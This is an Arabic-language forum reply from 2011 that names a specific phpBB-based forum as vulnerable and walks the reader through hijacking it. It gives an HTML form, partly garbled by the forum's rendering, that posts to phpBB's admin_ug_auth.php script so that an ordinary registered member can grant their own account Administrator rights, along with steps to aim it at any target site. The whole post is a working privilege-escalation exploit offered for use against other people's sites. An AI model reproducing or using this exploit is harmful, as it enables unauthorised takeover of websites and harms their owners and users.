عرض مشاركة واحدة
قديم 07-02-2011, 12:38 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
neo-m
Dark magician
 
الصورة الرمزية neo-m
 

 

 
إحصائية العضو







neo-m غير متواجد حالياً

إرسال رسالة عبر MSN إلى neo-m

 

 

إحصائية الترشيح

عدد النقاط : 10
neo-m is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة sh-jaf
ما بقي إلا أشوف ثغرة في Powered by phpBB © 2001
ان شاء الله نشوف

أجل في ثغرة اخي هاذا هو المنتدى
http://www.cheela.org

وهاذا هو استغلال الثغرة

يجب اولا التسجيل في المنتدى
<font color="Blue" size="6">
ثم احفظ الايد تبعك يعني رقم العضوية
ثم افتح مفكرة جديدة
واكتب فيها هاذا الكود
كود PHP:
<html
<
head
</
head
******> 
 
<
form method="post"  
action="http://www.domain_name/board_directory/adm in/admin_ug_auth.php"
User Level: <select name="userlevel"
<
option value="admin">Administrator</option
<
option value="user">User</option></select
<
input type="hidden" name="private***91;1***93;" value="0"
<
input type="hidden" name="moderator***91;1***93;" value="0"
<
input type="hidden" name="mode" value="user"
<
input type="hidden" name="adv" value=""
User Number: <input type="text" name="u" size="5"
<
input type="submit" name="submit" value="Submit"
 
</
form
</
body
</
html
ثم عدل على الكود بالموقع الذي تريد اختراقه
ضع الموقع في مكان هاذا الرابط
http://www.domain_name
/board_directory

ثم احفض المفكرة بصيغة html

عندما تدخل الى الصفحة التي قمت بحفظها سوف تجد
قائمة والتي يتم اختيار التصريح الذي تريده لتطبيق الثغرة اختر تصريح Administrator
ثم بالمربع الجانبي شع رقم عضويتك بالمنتدى
أضغط زر submit
بعدها سوف تاتيك شاشة تسجيل الدخول ضع اسم المستخدم وكلمة المرور الخاصة بك

التوقيع


 


التعديل الأخير تم بواسطة neo-m ; 07-02-2011 الساعة 12:46 AM.